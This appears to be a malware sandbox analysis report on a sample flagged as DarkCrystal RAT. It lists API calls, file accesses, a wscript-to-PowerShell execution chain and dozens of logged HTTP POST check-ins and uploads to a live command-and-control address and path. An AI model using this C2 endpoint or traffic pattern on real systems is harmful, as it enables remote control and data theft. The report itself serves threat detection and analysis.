                                    Source: Binary string: yC:/Users/user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000003FFA000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000003FFA000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000004E43000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000004E43000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000003FFA000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000003FFA000.00000004.00000800.00020000.00000000.sdmp
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeCode function: 0_2_0090A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0090A69B
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeCode function: 0_2_0091C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0091C220
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeFile opened: C:\Users\userJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeFile opened: C:\Users\user\AppDataJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeFile opened: C:\Users\user\AppData\LocalJump to behavior

                                    Software Vulnerabilities

                                    barindex
                                    Suspicious execution chain found
                                    Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeCode function: 4x nop then jmp 00007FFD9B9F2126h5_2_00007FFD9B9E07F8
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeCode function: 4x nop then jmp 00007FFD9B9F2126h5_2_00007FFD9B9E0860
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeCode function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh5_2_00007FFD9BB9D1DD
                                    Source: C:\Recovery\uAsLgsGzSk.exeCode function: 4x nop then jmp 00007FFD9BA22126h35_2_00007FFD9BA21F1E
                                    Source: C:\Recovery\uAsLgsGzSk.exeCode function: 4x nop then jmp 00007FFD9BA02126h37_2_00007FFD9B9F0860

                                    Networking

                                    barindex
                                    Suricata IDS alerts for network traffic
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49736 -> 89.23.100.242:80
                                    Source: Joe Sandbox ViewASN Name: MAXITEL-ASRU MAXITEL-ASRU
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 384Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 1820Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2020Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2536Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: multipart/form-data; boundary=----s4VOHFAR20G8vVPIwClEHtRE0DwTdOyX8pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 204914Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2036Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
